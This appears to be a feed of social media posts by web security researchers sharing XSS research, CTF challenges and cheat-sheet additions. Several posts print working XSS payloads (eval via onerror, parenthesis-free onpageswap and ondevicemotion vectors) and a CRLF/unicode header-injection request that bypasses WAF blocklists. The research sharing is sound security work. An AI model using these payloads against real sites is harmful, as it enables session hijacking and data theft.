I'm happy to release a script gadgets wiki inspired by the work of @slekies, @kkotowicz, and @sirdarckcat in their Black Hat USA 2017 talk! 🔥
The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇
gmsgadget.com
1/4
New blog post is up: How I leaked the IP addresses of Brave's Tor window and Chrome VPN extension users--plus, a new Popunder technique and connect-src CSP directive bypass. Read more @ 0x999.net/blog/leaking...
<script> onpageswap=setTimeout; location='x'; Event.prototype.toString=EvalError.prototype.toString; Event.prototype.name='alert\x281\x29' </script>
Abuse EvalError, onpageswap, and setTimeout to get JS execution without parens.
@0x999.net redirects the page to trigger onpageswap, hijacks the thrown error, and turns it into code. Inspired by @terjanq.me. Now available on the XSS cheat sheet.
Link to vector👇
portswigger.net/web-security...
<img/src/onerror=window.onerror=eval;ReferenceError.prototype.name=';alert\x281\x29;var\x20Uncaught//';z>
This vector adds an onerror handler with eval, rewrites all ReferenceError names, then triggers an error to execute the payload. Just added it to the XSS cheat sheet. Credit to @0x999.net , inspired by @terjanq.me
portswigger.net/web-security...
ondevicemotion=setTimeout; Event.prototype.toString=URIError.prototype.toString; Event.prototype.message='alert\x281\x29'
Crafty JavaScript-context XSS vector using ondevicemotion, setTimeout, and URIError spoofing to trigger alert(1) now added to the XSS cheat sheet. By @0x999.net inspired by @terjanq.me
Link to vector👇
portswigger.net/web-security...
Unicode characters with a decomposition of 2+ ASCII characters and are registrable domains by _0x999
shazzer.co.uk/vectors/681b...
This month, @0x999.net made an awesome and difficult Intigriti XSS challenge. I really enjoyed the openness of this challenge resulting in an unintended solution and the first solve 🩸!
Check out how I got there in my writeup below:
jorianwoltjer.com/blog/p/hacki...
Here is my author's writeup for Intigriti's March 0325 CTF challenge, Thanks to everyone who participated & great job by all the solvers! 🔥
0x999.net/blog/intigri...
I made a little challenge for @intigriti.com
Goal: Steal the Bot's flag!⛳️
Try it out 👇
The Spanner is back! 🎉 I finally ditched WordPress for a custom blogging system. If you miss the golden era of web hacking, you’ll love revisiting classics like mXSS, DOM Clobbering, and RPO. Plus, plenty of quirky, vintage research gems.
thespanner.co.uk
Awesome!🔥
I'm very happy to finally share the second part of my DOMPurify security research 🔥
This article mostly focuses on DOMPurify misconfigurations, especially hooks, that downgrade the sanitizer's protection (even in the latest version)!
Link 👇
mizu.re/post/explori...
1/2
GET /%0D%0ASet-Cookie: foo=bar 403 Forbidden GET /%E4%BC%8D%E4%BC%8ASet-Cookie: foo=bar 200 OK Set-Cookie: foo=bar
Discover blocklist bypasses via unicode overflows using the latest updates to ActiveScan++, Hackvertor & Shazzer! Thanks to Ryan Barnett and Neh Patel for sharing this technique.
portswigger.net/research/byp...
My blog post, "Exploring Javascript Events & Bypassing WAFs via Character Normalization" has been nominated for the Top 10 Web Hacking Techniques of 2024!☺️
If you found it useful, I’d greatly appreciate your vote at the link below 👇
portswigger.net/polls/top-10...
Got sniped into the challenge and ended up doing some cool XSS research :D
11 char XSS with mind-boggling race-conditions.
TL;DR the final payload is location=x (10 chars) and the longest is top.Z.x=x.d (11 char)
It's shorter than location=name !!
terjanq.me/solutions/jo...
Very cool technique by @nastystereo.com for POST based CSRF without a content-type header using a Blob object, Interestingly it also seems to work using a Uint8Array
I get a similar feeling sharing this here since this is just my first blog post but since part of it is inspired by your post I hope it's ok :) 0x999.net/blog/explori...
To summarize what I have learned about Mutation XSS, my CVE, and the solution to my challenge, I wrote a post going through it all.
If you like regular XSS, this is a whole new world of crazy techniques and many sanitizer bypasses. You too can learn this!
jorianwoltjer.com/blog/p/hacki...
Here is the "writeup". Hope its clear enough, otherwise ask in comments. Note that there are two paths that will result in XSS. And that the "error path" can be reached in numerous different ways, like alternative 1 and 4.
Alternative 5 hits the "successful path" and can also be used in many ways
Very cool, thanks for sharing!
Just published a new blog post "Exploring Javascript events & Bypassing WAFs via character normalization", check it out: 0x999.net/blog/explori...
I'm guessing 2 and 5 since they won't be resolved as a valid URLs?🤷♂️
We’re finally live! You can now watch “Listen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPj...
Some cool new additions at CSPBypass.com by omidxrz
For example:
cspbypass.com#onetrust
<3
I made a little xss challenge based on an upcoming blogpost, if anyone wants to check it out:
xss.0x999.net
Goal:
1. Alert the flag
2. Execute arbitrary javascript
Hello World
